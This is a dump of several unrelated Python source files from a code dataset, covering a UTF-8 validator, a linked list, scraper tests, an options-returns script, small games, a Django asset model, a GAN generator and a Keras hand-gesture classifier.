s.replace(\"\\\\\\\\\", \"\\\\\")\n\n return s\n # return _unicodeExpand(s) # hmm - string escape doesn't do unicode escaping\n\n\ndef decodeUnicodeEscape(s):\n \"\"\"\n s is a unicode string\n replace ``\\\\n`` and ``\\\\u00AC`` unicode escapes\n \"\"\"\n if \"\\\\\" not in s:\n # Most of times, there are no backslashes in strings.\n # In the general case, it could use maketrans and translate.\n return s\n\n s = s.replace(\"\\\\t\", \"\\t\")\n s = s.replace(\"\\\\n\", \"\\n\")\n s = s.replace(\"\\\\r\", \"\\r\")\n s = s.replace(\"\\\\b\", \"\\b\")\n s = s.replace(\"\\\\f\", \"\\f\")\n s = s.replace('\\\\\"', '\"')\n s = s.replace(\"\\\\'\", \"'\")\n s = s.replace(\"\\\\\\\\\", \"\\\\\")\n\n s = _unicodeExpand(s) # hmm - string escape doesn't do unicode escaping\n\n return s\n\n\n# Migration to abc in Python 3.8\ntry:\n from collections.abc import Mapping, MutableMapping\nexcept:\n from collections import Mapping, MutableMapping\n","sub_path":"venv/lib/python3.9/site-packages/rdflib/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"148999367","text":"from __future__ import annotations \nimport collections \nimport random \nimport heapq \nimport math\nimport bisect\n\n\n\"\"\"\nSuccess\nDetails \nRuntime: 128 ms, faster than 67.47% of Python3 online submissions for UTF-8 Validation.\nMemory Usage: 14.1 MB, less than 28.00% of Python3 online submissions for UTF-8 Validation.\n\"\"\"\n\nclass Solution:\n def validUtf8(self, data: List[int]) -> bool:\n count = 0\n for char in data:\n if count == 0:\n if char >> 3 == 0b11110:\n count = 3\n elif char >> 4 == 0b1110:\n count = 2\n elif char >> 5 == 0b110:\n count = 1\n elif char >> 7 == 0b1:\n return False\n else:\n if char >> 6 == 0b10:\n count -= 1\n else:\n return False\n return count == 0\n \n\n","sub_path":"M_393_validUtf8.py","file_name":"M_393_validUtf8.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"50441296","text":"maxElem = 20\n\n\nclass Node():\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n def __repr__(self):\n return f'{self.val}'\n\n def displayTillEnd(self):\n global maxElem\n\n cur = self\n ans = []\n maxIter = maxElem\n\n while cur and maxIter:\n maxIter -= 1\n ans.append(str(cur.val))\n cur = cur.next\n if ans:\n print(' -> '.join(ans))\n else:\n print('')\n\n\nclass singlyLinkedList():\n def __init__(self):\n self.head = None\n\n def push(self, val, next=None):\n cur = self.head\n if cur == None:\n self.head = Node(val, next)\n else:\n while cur.next:\n cur = cur.next\n cur.next = Node(val, next)\n\n def __repr__(self):\n global maxElem\n ans = []\n cur = self.head\n maxIter = maxElem\n while cur and maxIter:\n maxIter -= 1\n ans.append(str(cur))\n cur = cur.next\n if len(ans):\n return ' -> '.join(ans)\n else:\n return f''\n\n def __len__(self):\n if self.head == None:\n return 0\n else:\n count = 0\n cur = self.head\n while cur:\n count += 1\n cur = cur.next\n return count\n\n def pop(self):\n if self.head:\n if self.head.next == None:\n self.head = None\n else:\n cur = self.head\n while cur.next.next:\n cur = cur.next\n last = cur.next\n del last\n cur.next = None\n\n def delFirst(self):\n if self.head:\n cur = self.head\n del cur\n self.head = self.head.next\n\n @staticmethod\n def display(node):\n cur = node\n ans = []\n while cur:\n ans.append(str(cur.val))\n cur = cur.next\n print(' -> '.join(ans))\n","sub_path":"Day6_Linked_list_2/dataStructure/linkedList.py","file_name":"linkedList.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"441777390","text":"import os\n\nimport pytest\n\nfrom mlscraper import (\n MultiItemScraper,\n SingleItemScraper,\n MultiItemPageSample,\n SingleItemPageSample,\n)\n\n\ndef read_file(relative_path):\n file_path = os.path.join(os.path.dirname(__file__), relative_path)\n with open(file_path) as file:\n html = file.read()\n return html\n\n\n@pytest.fixture\ndef single_basic_train_html():\n return read_file(os.path.join(\"static\", \"single\", \"basic\", \"train.html\"))\n\n\n@pytest.fixture\ndef multi_single_result_page_html():\n return read_file(os.path.join(\"static\", \"multi\", \"single-result-page.html\"))\n\n\n@pytest.fixture\ndef whitespace_html():\n html = b\"\"\"\"\n \n
\n
\n Peter \n
\n
Cool-looking guy
\n
\n \"\"\"\n return html\n\n\ndef test_multi(multi_single_result_page_html):\n items = [\n {\"title\": \"One great result!\", \"description\": \"Some description\"},\n {\"title\": \"Another great result!\", \"description\": \"Another description\"},\n {\"title\": \"Result to be found\", \"description\": \"Description to crawl\"},\n ]\n\n html = multi_single_result_page_html\n scraper = MultiItemScraper.build([MultiItemPageSample(html, items)])\n assert scraper.scrape(html) == items\n\n # optional since they're only human guesses\n # assert \".result-single\" in scraper.parent_selector\n # assert scraper.value_selectors == {\"title\": \"h2\", \"description\": \"p\"}\n\n\ndef test_single(single_basic_train_html):\n data = {\"name\": \"Peter\", \"description\": \"Cool-looking guy\"}\n samples = [SingleItemPageSample(single_basic_train_html, data)]\n scraper = SingleItemScraper.build(samples)\n result = scraper.scrape(single_basic_train_html)\n assert result == data\n\n\n@pytest.mark.skip(\"not stable\")\ndef test_single_with_whitespace(whitespace_html):\n data = {\"name\": \"Peter\", \"description\": \"Cool-looking guy\"}\n samples = [SingleItemPageSample(whitespace_html, data)]\n scraper = SingleItemScraper.build(samples)\n result = scraper.scrape(\n b'
Klaus
'\n )\n assert result == {\"name\": \"Klaus\"}\n","sub_path":"tests/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"648412928","text":"import pandas as pd\nimport datetime\nMAX_PRICE = 10000\n\ndf = pd.read_csv('data/all_spx_options.csv')\n\n# apply filters\ndf = df[~((df['type'] == 'put') & (df['strike'] - df['underlying_last'] > df['ask'])) & ~((df['type'] == 'c') & (df['underlying_last'] - df['strike'] > df['ask']))]\ndf = df[~((df['type'] == 'put') & (df['strike'] < df['bid']))]\ndf = df[df['bid'] < df['ask']]\ndf = df[(df['ask'] <= MAX_PRICE)]\n\nholidays = set(pd.to_datetime(pd.read_csv('holidays_1990_2020.csv')['date']))\n\ndf['midpoint'] = (df['bid'] + df['ask']) / 2.0\ndf = df.reset_index()\ndf['date'] = pd.to_datetime(df['date'])\n\ng = df.groupby(['expiration','strike','type'])\ndf_list = []\n#print(len(uniques))\nidx = 0\nprint(\"# groups: %d\" % len(g))\n\ndf = df[df['date'].notna() & df['bid'].notna() & df['ask'].notna() & df['expiration'].notna() & df['strike'].notna() & df['type'].notna()]\n\nfor name, group in g:\n# if idx == 10:\n# break\n #print(name)\n #print(group)\n print(idx)\n\n #dat = df.loc[u]\n dat = group\n #print(dat['date'])\n if dat['date'].duplicated().any():\n continue\n dat = dat.sort_values('date').reset_index()\n # if any([x > 2 for x in dat['date']\n #dat['return'] = dat['midpoint'].shift(-1).shift(1) / dat['midpoint'].shift(1)\n dat['yest_1d_ret'] = dat['bid'].shift(-1).shift(1) / dat['ask'].shift(1)\n dat['yest_midpoint_ret'] = dat['midpoint'].shift(-1).shift(1) / dat['midpoint'].shift(1)\n dat['yest_exit_ret'] = dat['bid'].shift(-1).shift(1) / dat['midpoint'].shift(1)\n dat['yest_enter_ret'] = dat['midpoint'].shift(-1).shift(1) / dat['ask'].shift(1)\n\n dat['tmrw_1d_ret'] = dat['bid'].shift(-1) / dat['ask'].shift(1).shift(-1)\n dat['tmrw_midpoint_ret'] = dat['midpoint'].shift(-1) / dat['midpoint'].shift(1).shift(-1)\n dat['tmrw_exit_ret'] = dat['bid'].shift(-1) / dat['midpoint'].shift(1).shift(-1)\n dat['tmrw_enter_ret'] = dat['bid'].shift(-1) / dat['midpoint'].shift(1).shift(-1)\n\n dat['time_from_last_tick'] = (dat['date'].shift(-1).shift(1) - dat['date'].shift(1))\n dat['date_of_last_tick'] = dat['date'].shift(1)\n # dat = dat.iloc[1:]\n # print('dat before len: ', len(dat))\n # dat = dat[(dat['time_from_last_tick'].dt.days == 1) | ((dat['time_from_last_tick'].dt.days == 3) & (dat['date'].dt.weekday == 0))\n\t\t# \t | (((dat['date'] - datetime.timedelta(days=1)).isin(holidays)) & (dat['time_from_last_tick'] == 2))\n\t\t# \t | (((dat['date'] - datetime.timedelta(days=1)).isin(holidays)) & (dat['time_from_last_tick'] == 4) & (dat['date'].dt.weekday==1))]\n # print('dat after len: ', len(dat))\n # print('dat: ', dat[['date','bid','ask','midpoint','tmrw_midpoint_ret','tmrw_1d_ret']])\n\n df_list.append(dat)\n idx += 1\n\n\ndf = pd.concat(df_list)\n\ndate_groups = df.groupby('date')\n\ndf_list = []\nsorted_date_groups = sorted(date_groups.groups)\nfor idx,n in enumerate(sorted_date_groups[:-1]):\n g = date_groups.get_group(n)\n yest_groups = set(date_groups.get_group(sorted_date_groups[idx - 1]).groupby(['strike','expiration','type']).groups)\n tmrw_groups = set(date_groups.get_group(sorted_date_groups[idx + 1]).groupby(['strike','expiration','type']).groups)\n\n g['yest_data'] = [(e[1]['strike'],e[1]['expiration'],e[1]['type']) in yest_groups for e in g.iterrows()]\n g['tmrw_data'] = [(e[1]['strike'],e[1]['expiration'],e[1]['type']) in tmrw_groups for e in g.iterrows()]\n df_list.append(g)\n\ndf_out = pd.concat(df_list,axis=0)\n\ndf_out.set_index(['expiration','strike','type'],inplace=True)\ndf_out.to_csv('data/all_spx_options_with_returns.csv')\n","sub_path":"construct_options_returns.py","file_name":"construct_options_returns.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256253538","text":"import random;\nfrom termcolor import colored, cprint\n\nnumber = random.randint(1, 25)\nmaxattempts = 6\nnumber_of_guesses = 0\ncprint('Guess the number between 1 and 25.','green')\n\nwhile number_of_guesses < maxattempts:\n number_of_guesses += 1\n guess = int(input())\n if guess < number:\n cprint('Your guess is too low you have '+str(maxattempts-number_of_guesses)+' tries left.','red')\n if guess > number:\n cprint('Your guess is too high','red')\n\n if guess == number:\n break\n\n \nif guess == number:\n if int(number_of_guesses) < 1:\n cprint('You guessed the number first time!','green')\n else:\n cprint('You guessed the number in ' + str(number_of_guesses) + ' tries!\\nIt was '+str(number),'yellow')\nelse:\n cprint('You did not guess the number, The number was ' + str(number),'red')\n \n","sub_path":"NumberGuesser.py","file_name":"NumberGuesser.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"100841303","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nimport logging\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom . import IDC, AssetGroup, AdminUser, SystemUser\n\n__all__ = ['Asset']\nlogger = logging.getLogger(__name__)\n\n\ndef get_default_idc():\n return IDC.initial()\n\n\nclass Asset(models.Model):\n STATUS_CHOICES = (\n ('In use', _('In use')),\n ('Out of use', _('Out of use')),\n )\n TYPE_CHOICES = (\n ('Server', _('Server')),\n ('VM', _('VM')),\n ('Switch', _('Switch')),\n ('Router', _('Router')),\n ('Firewall', _('Firewall')),\n ('Storage', _(\"Storage\")),\n )\n ENV_CHOICES = (\n ('Prod', 'Production'),\n ('Dev', 'Development'),\n ('Test', 'Testing'),\n )\n\n # Important\n ip = models.GenericIPAddressField(max_length=32, verbose_name=_('IP'), db_index=True)\n hostname = models.CharField(max_length=128, unique=True, verbose_name=_('Hostname'))\n port = models.IntegerField(default=22, verbose_name=_('Port'))\n groups = models.ManyToManyField(AssetGroup, blank=True, related_name='assets',\n verbose_name=_('Asset groups'))\n admin_user = models.ForeignKey(AdminUser, null=True, blank=True, related_name='assets',\n on_delete=models.SET_NULL, verbose_name=_(\"Admin user\"))\n system_users = models.ManyToManyField(SystemUser, blank=True,\n related_name='assets',\n verbose_name=_(\"System User\"))\n idc = models.ForeignKey(IDC, blank=True, null=True, related_name='assets',\n on_delete=models.SET_NULL, verbose_name=_('IDC'),)\n is_active = models.BooleanField(default=True, verbose_name=_('Is active'))\n type = models.CharField(choices=TYPE_CHOICES, max_length=16, blank=True, null=True,\n default='Server', verbose_name=_('Asset type'),)\n env = models.CharField(choices=ENV_CHOICES, max_length=8, blank=True, null=True,\n default='Prod', verbose_name=_('Asset environment'),)\n status = models.CharField(choices=STATUS_CHOICES, max_length=12, null=True, blank=True,\n default='In use', verbose_name=_('Asset status'))\n\n # Some information\n public_ip = models.GenericIPAddressField(max_length=32, blank=True,\n null=True, verbose_name=_('Public IP'))\n remote_card_ip = models.CharField(max_length=16, null=True, blank=True,\n verbose_name=_('Remote control card IP'))\n cabinet_no = models.CharField(max_length=32, null=True, blank=True, verbose_name=_('Cabinet number'))\n cabinet_pos = models.IntegerField(null=True, blank=True, verbose_name=_('Cabinet position'))\n number = models.CharField(max_length=32, null=True, blank=True, verbose_name=_('Asset number'))\n\n # Collect\n vendor = models.CharField(max_length=64, null=True, blank=True, verbose_name=_('Vendor'))\n model = models.CharField(max_length=54, null=True, blank=True, verbose_name=_('Model'))\n sn = models.CharField(max_length=128, null=True, blank=True, verbose_name=_('Serial number'))\n\n cpu_model = models.CharField(max_length=64, null=True, blank=True, verbose_name=_('CPU model'))\n cpu_count = models.IntegerField(null=True, verbose_name=_('CPU count'))\n cpu_cores = models.IntegerField(null=True, verbose_name=_('CPU cores'))\n memory = models.CharField(max_length=64, null=True, blank=True, verbose_name=_('Memory'))\n disk_total = models.CharField(max_length=1024, null=True, blank=True, verbose_name=_('Disk total'))\n disk_info = models.CharField(max_length=1024, null=True, blank=True, verbose_name=_('Disk info'))\n\n platform = models.CharField(max_length=128, null=True, blank=True, verbose_name=_('Platform'))\n os = models.CharField(max_length=128, null=True, blank=True, verbose_name=_('OS'))\n os_version = models.CharField(max_length=16, null=True, blank=True, verbose_name=_('OS version'))\n os_arch = models.CharField(max_length=16, blank=True, null=True, verbose_name=_('OS arch'))\n hostname_raw = models.CharField(max_length=128, blank=True, null=True, verbose_name=_('Hostname raw'))\n\n created_by = models.CharField(max_length=32, null=True, blank=True, verbose_name=_('Created by'))\n date_created = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name=_('Date created'))\n comment = models.TextField(max_length=128, default='', blank=True, verbose_name=_('Comment'))\n\n def __unicode__(self):\n return '%s <%s: %s>' % (self.hostname, self.ip, self.port)\n __str__ = __unicode__\n\n @property\n def is_valid(self):\n warning = ''\n if not self.is_active:\n warning += ' inactive'\n else:\n return True, ''\n return False, warning\n\n def to_json(self):\n return {\n 'id': self.id,\n 'hostname': self.hostname,\n 'ip': self.ip,\n 'port': self.port,\n }\n\n def _to_secret_json(self):\n \"\"\"Ansible use it create inventory\"\"\"\n return {\n 'id': self.id,\n 'hostname': self.hostname,\n 'ip': self.ip,\n 'port': self.port,\n 'groups': [group.name for group in self.groups.all()],\n 'username': self.admin_user.username if self.admin_user else '',\n 'password': self.admin_user.password if self.admin_user else '',\n 'private_key': self.admin_user.private_key_file if self.admin_user else None,\n 'become': {\n 'method': self.admin_user.become_method,\n 'user': self.admin_user.become_user,\n 'pass': self.admin_user.become_pass,\n } if self.admin_user and self.admin_user.become else {},\n }\n\n class Meta:\n unique_together = ('ip', 'port')\n\n @classmethod\n def generate_fake(cls, count=100):\n from random import seed, choice\n import forgery_py\n from django.db import IntegrityError\n\n seed()\n for i in range(count):\n asset = cls(ip='%s.%s.%s.%s' % (i, i, i, i),\n hostname=forgery_py.internet.user_name(True),\n admin_user=choice(AdminUser.objects.all()),\n idc=choice(IDC.objects.all()),\n port=22,\n created_by='Fake')\n try:\n asset.save()\n asset.system_users = [choice(SystemUser.objects.all()) for i in range(3)]\n asset.groups = [choice(AssetGroup.objects.all()) for i in range(3)]\n logger.debug('Generate fake asset : %s' % asset.ip)\n except IntegrityError:\n print('Error continue')\n continue\n\n","sub_path":"jumpserver-dev/apps/assets/models/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"496719087","text":"import tensorflow as tf\nimport numpy as np\nimport tensorflow_addons as tfa\nimport layers\n\n\nclass ResidualBlock(tf.keras.layers.Layer):\n '''Defines a Block as used in the ResNet architecture\n 2 covolutional layers\n InstanceNormalization (instead of Batchnorm)\n Reflection Padding\n\n Keyword Arguments:\n nr_filters : amount of filters for the convolutional layers\n kernel_initializer: how to inititialize the weights'''\n def __init__(self, nr_filters, kernel_initializer, size):\n super(ResidualBlock,self).__init__()\n\n #use padding to keep the featuremap size constant even after applying convolutions\n #self.padd1 = layers.ReflectionPadding2D()\n\n #3x3 conv, normalization, relu, 3x3 conv, normalization, relu\n self.conv_1 = tf.keras.layers.Conv2D(filters = nr_filters, kernel_size = 3,\n kernel_initializer = kernel_initializer\n #kernel_regularizer = tf.keras.regularizers.l2(0.01),\n #padding = 'same'\n )\n\n #instance normalization\n self.norm_1 = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.relu_1 = tf.keras.layers.ReLU()\n\n #self.padd2 = layers.ReflectionPadding2D()\n self.conv_2 = tf.keras.layers.Conv2D(filters = nr_filters, kernel_size = 3,\n kernel_initializer = kernel_initializer\n # padding = 'same'\n )\n self.norm_2 = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.crop = tf.keras.layers.experimental.preprocessing.CenterCrop(height=size, width = size)\n\n\n self.relu_2 = tf.keras.layers.ReLU()\n\n def call(self, start_x):\n #x = self.padd1(start_x)\n x = self.conv_1(start_x)\n x = self.norm_1(x)\n\n x = self.relu_1(x)\n #x = self.padd2(x)\n x = self.conv_2(x)\n x = self.norm_2(x)\n # skip connections are used: add up the input of the block to its output\n # but first the input needs to be cropped as the output is smaller in max_size\n # (Johnson et al. do not use padding in residual blocks)\n start_x = self.crop(start_x)\n x = x + start_x\n x = self.relu_2(x)\n return x\n\n\n\nclass DownsampleBlock(tf.keras.layers.Layer):\n '''Block used for downsampling images/featuremaps with strided convolutions\n Convolutional layer, Instance Normalization, LeakyReLU activation\n\n Keyword Arguments:\n parameters needed to define convolutional layer'''\n def __init__(self, nr_filters, kernel_size, stride, padding, kernel_initializer):\n super(DownsampleBlock,self).__init__()\n\n self.conv = tf.keras.layers.Conv2D(nr_filters, kernel_size= kernel_size, strides = stride,\n padding=padding, kernel_initializer = kernel_initializer)\n self.norm_layer = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.activation = tf.keras.layers.LeakyReLU()\n\n def call(self, x):\n\n x = self.conv(x)\n x = self.norm_layer(x)\n\n x = self.activation(x)\n\n return x\n\n\n\nclass UpsampleBlock(tf.keras.layers.Layer):\n '''Block used for upsampling images with fractionally strided convolution,\n TransposedConvolutional layer, Instance Normalization, LeakyReLU activation\n\n Keyword Arguments:\n parameters needed to define convolutional layer'''\n def __init__(self, nr_filters, kernel_size, stride, kernel_initializer):\n super(UpsampleBlock,self).__init__()\n\n self.conv = tf.keras.layers.Conv2DTranspose(nr_filters, kernel_size= kernel_size, strides = stride,\n padding='same', kernel_initializer = kernel_initializer)\n self.norm_layer = tfa.layers.InstanceNormalization(\n gamma_initializer = tf.keras.initializers.RandomNormal(mean=0.0, stddev=0.02))\n\n self.activation = tf.keras.layers.LeakyReLU()\n\n def call(self, x):\n\n x = self.conv(x)\n x = self.norm_layer(x)\n\n x = self.activation(x)\n\n return x\n\n\n\n\nclass Generator(tf.keras.Model):\n '''Generator is built up from different Down-, upsampling and Residual blocks\n\n architecture based Image Transformation Network by Johnson'''\n def __init__(self):\n super(Generator, self).__init__()\n #structure as referenced by Zhu et al. is different from Johnson architecture:\n #Zhu: c7s1-64,d128,d256,R256,R256,R256, R256,R256,R256,u128,u64,c7s1-3\n\n #Weights are initialized from a Gaussian distribution N(0, 0.02).\n kernel_initializer = tf.random_normal_initializer(stddev=0.02)\n\n #padd before using a 7x7 kernel as done in the first layer (Defined in strided block)\n self.padd1 = layers.ReflectionPadding2D(padding=(40, 40))\n\n self.strided_block = [\n #Johnson: 32 x9 x9 conv, stride 1 -> 32× 208×208\n #but in the cycle gan paper use 7x7, 64\n DownsampleBlock(nr_filters =32, kernel_size = 9, stride = 1, padding = 'same', kernel_initializer = kernel_initializer),\n\n #Johnson: 64×3×3, conv, stride 2 -> 64×104× 104\n #Zhu: 128x3x3\n DownsampleBlock(nr_filters = 64,kernel_size = 3, stride = 2, padding = 'same',kernel_initializer = kernel_initializer),\n\n #Johnson: 128×3×3 conv, stride 2 -> 128×52x52\n #Zhu: 256\n DownsampleBlock(nr_filters =128, kernel_size = 3, stride = 2, padding = 'same', kernel_initializer = kernel_initializer)\n ]\n\n #Residual blocks -> 5 in Johnson architecture\n self.blocks = [\n # -> 128 x 48 x48\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 48),\n # 128 x 44 x44\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 44),\n # 128 x 40x40\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 40),\n # 128 x 36 x 36\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 36),\n # 128 x 32 x32\n ResidualBlock(128, kernel_initializer = kernel_initializer, size = 32),\n ]\n\n self.transposed_block = [\n #64×3×3 conv, stride 1/2 -> 64×64 x64\n UpsampleBlock(64,3,2, kernel_initializer),\n #32×3×3 conv, stride 1/2 -> 32×128×128\n UpsampleBlock(32,3,2, kernel_initializer),\n ]\n #padding:\n #self.padd2 = layers.ReflectionPadding2D(padding=(self.padds, self.padds))\n\n #3×9×9 conv, stride 1 3×128×128\n #Johnson et al. use tanh\n self.final_layer = tf.keras.layers.Conv2D(filters=3, kernel_size=9,\n strides =1, activation = tf.keras.activations.tanh,\n padding = 'same', kernel_initializer = kernel_initializer)\n\n\n def call(self, x):\n x = self.padd1(x)\n\n for layer in self.strided_block:\n x = layer(x)\n\n for block in self.blocks:\n x = block(x)\n\n for layer in self.transposed_block:\n x = layer(x)\n\n\n #x = self.padd2(x)\n\n x = self.final_layer(x)\n return x\n","sub_path":"models/generator_johns.py","file_name":"generator_johns.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214169448","text":"import sys\nimport time\nimport gas_core1\n\n\n\ntyping_speed = 12\ndef slow_type(t):\n for l in t:\n sys.stdout.write(l)\n sys.stdout.flush()\n time.sleep(typing_speed / 970.0)\n return input()\n\n\n \nslow_type('\\n⛽ WELCOME TO >>>VARGAS\\'S<<< GAS STATION! ⛽\\n\\n PRESS \"ENTER\" 🔥🔥🔥!')\n\n\ndef print_menu():\n menu = {'regular': 1.89, 'midgrade': 1.99, 'premium': 2.09}\n print(menu)\n\ndef gallons(dollars, gas_type):\n if gas_type == 'regular':\n gallons = float(dollars) * 1.89\n return gallons\n elif gas_type == 'midgrade':\n gallons = float(dollars) * 1.99\n return gallons\n elif gas_type == 'premium':\n gallons = float(dollars) * 2.09\n return gallons\n else:\n print('\\n\\nInvalid Input...\\n\\n')\n time.sleep(.8)\n\ndef total(gallons, gas_type):\n if gas_type == 'regular':\n total = 1.89 * float(gallons)\n return total\n elif gas_type == 'midgrade':\n total = 1.99 * float(gallons)\n return total\n elif gas_type == 'premium':\n total = 2.09 * float(gallons)\n return total\n else:\n print('\\n\\nInvalid Input...\\n\\n')\n time.sleep(.8)\n\npay_option = slow_type('\\n\\n💲💲 Please Enter Payment Option From The Two We Provide.\\n\\n\"💲>>prepay<<💲\" Or \"💲>>pay after<<💲\": ')\nif pay_option == 'prepay':\n\n slow_type('\\n\\n➡ Please Take A Look At What We Have Here To Offer...\\n\\nPRESS \"ENTER\"...\\n\\n')\n \n\n print_menu()\n time.sleep(.4)\n \n gas_type = slow_type('\\n\\nPlease Enter Type Of Gas Desired: ')\n\n\n\n dollars = slow_type('\\n💲💲 Please Enter Cash Desired For Gas: $')\n\n \n\n print('\\n\\n\\n✔ Processing... ✔\\n\\n\\n')\n time.sleep(.4)\n\n print('You Have Chosen To Pump', gas_type, 'for ' + '$' + dollars, 'dollars.\\n\\n')\n time.sleep(2)\n print('\\n\\n\\nProcessing...😊')\n time.sleep(.9)\n slow_type('\\n\\n\\n\\n\\n\\nPRESS \"ENTER\" TO START!')\n print('\\n\\n\\n\\n⛽ Pumping... ⛽')\n time.sleep(3)\n print('\\nDONE!⛽')\n time.sleep(.5)\n slow_type('\\n\\nPRESS \"ENTER\" TO SEE RESULTS\\n\\n')\n \n print('\\n\\n\\n😊Thank You For Your Business..💲💲 \\n\\nYou Have Successfully Pumped:', gallons(dollars, gas_type), 'gallons!✔✔ \\n\\n')\n time.sleep(1.2)\n\nelif pay_option == 'pay after':\n slow_type('\\n\\nPlease Take A Look At What We Have Here To Offer. ↙\\n\\nPRESS \"ENTER\".\\n')\n\n print_menu()\n time.sleep(.5)\n\n gas_type = slow_type('\\n\\nPlease Enter Type Of Gas Desired: ')\n \n gallons = slow_type('\\n\\n♺Please Enter Gallons Desired To Pump ♺ : ')\n\n print('\\n\\nYou Have Chosen To Pump', gas_type, 'for', gallons, 'gallons.')\n time.sleep(2)\n\n input('\\n\\nPRESS \"ENTER\" TO START!')\n\n print('\\n\\n\\n✔ Pumping... ⛽\\n\\n\\n')\n time.sleep(2)\n print('\\n\\n✔✔✔DONE!✔✔✔\\n')\n time.sleep(.5)\n slow_type('\\n\\nPRESS \"ENTER\" TO SEE RESULTS\\n\\n')\n\n\n print('\\n\\n\\nThank Your Purchase! Your Total Is t: $', total(gallons, gas_type), 'dollars! \\n\\n')\n time.sleep(.2)\n\n\nslow_type('\\n\\n\\n\\n\\n\\n😊💲💲Please come again!!😊😊\\n\\nPRESS \"ENTER\" TO EXIT!')","sub_path":"gas_station.py","file_name":"gas_station.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423199569","text":"import colorlover as cl\r\nfrom numpy import array\r\n\r\ndef palette_de_couleurs(nb_of_colors):\r\n \"\"\" Input: the length of the list with different colors\r\n Output: a list with rgb colors in an ascending order\r\n \"\"\"\r\n \r\n bupu = cl.scales['9']['seq']['Reds']\r\n bupu500 = cl.interp( bupu, nb_of_colors ) # Map color scale to 500 bins\r\n colors=cl.to_rgb(bupu500)\r\n for i in range(nb_of_colors):\r\n color= colors[i][3:]\r\n c=array((0,0,0))\r\n for j in range(3):\r\n c[j]=color.strip(\"()\").split(\",\")[j]\r\n colors[i]=c\r\n return colors\r\n\r\n\r\n\"\"\"\r\nprint(cl.scales)\r\nprint(\"\\n\")\r\nprint(palette_de_couleurs(9))\r\n\"\"\"","sub_path":"INFOQ2/Projet Q2/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"277364384","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 14 15:35:35 2018\n\n@author: srinivas\n\"\"\"\n\nfrom imageio import imread\nimport numpy as np\nimport pandas as pd\nimport os\nroot = './RPS_data' # or ‘./test’ depending on for which the CSV is being created\n\n# go through each directory in the root folder given above\nfor directory, subdirectories, files in os.walk(root):\n# go through each file in that directory\n for file in files:\n # read the image file and extract its pixels\n print(file)\n im = imread(os.path.join(directory,file))\n value = im.flatten()\n# I renamed the folders containing digits to the contained digit itself. For example, digit_0 folder was renamed to 0.\n# so taking the 9th value of the folder gave the digit (i.e. \"./train/8\" ==> 9th value is 8), which was inserted into the first column of the dataset.\n value = np.hstack((directory[11:],value))\n df = pd.DataFrame(value).T\n df = df.sample(frac=1) # shuffle the dataset\n with open('train_foo.csv', 'a') as dataset:\n df.to_csv(dataset, header=False, index=False)\n \n#building the model \nimport numpy as np\nfrom keras.layers import Dense, Flatten, Conv2D\nfrom keras.layers import MaxPooling2D, Dropout\nfrom keras.utils import np_utils, print_summary\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks import TensorBoard\nimport pandas as pd\n\ndef keras_model(image_x, image_y):\n num_of_classes = 4\n model = Sequential()\n model.add(Conv2D(32, (5, 5), input_shape=(image_x, image_y, 1), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same'))\n model.add(Conv2D(64, (5, 5), activation='relu'))\n model.add(MaxPooling2D(pool_size=(5, 5), strides=(5, 5), padding='same'))\n model.add(Flatten())\n model.add(Dense(1024, activation='relu'))\n model.add(Dropout(0.6))\n model.add(Dense(num_of_classes, activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n filepath = \"train_RPS.h5\"\n checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n callbacks_list = [checkpoint]\n callbacks_list.append(TensorBoard(log_dir='RPS_logs'))\n\n return model, callbacks_list\n\n\ndef loadData():\n data = pd.read_csv(\"train_foo_RPS.csv\")\n dataset = np.array(data)\n np.random.shuffle(dataset)\n features = dataset[:, 1:2501]\n features = features / 255.\n labels = dataset[:, 0]\n labels = labels.reshape(labels.shape[0], 1)\n train_x, test_x, train_y, test_y = train_test_split(features, labels, 